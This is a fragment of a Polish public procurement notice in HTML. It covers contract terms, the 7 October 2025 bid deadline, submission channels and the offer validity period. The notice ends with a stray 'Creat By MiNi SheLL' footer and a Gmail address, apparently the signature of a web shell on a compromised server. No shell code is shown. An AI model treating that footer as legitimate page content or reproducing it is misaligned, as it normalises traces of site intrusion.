class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-10-07 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Portal e-Zamówienia https://ezamowienia.gov.pl/pl/ lub w przypadkach uzasadnionych np. udokumentowanej awarii systemu portalu e-Zamówienia, itp, ofertę można złożyć elektronicznie za pośrednictwem poczty, na adres e-mail: d.sedziwy@teatr-mickiewicza.pl, liczy się wówczas data i godzina wpłynięcia korespondencji na serwer Zamawiającego.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-10-07 14:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Bez uwag.

Creat By MiNi SheLL
Email: jattceo@gmail.com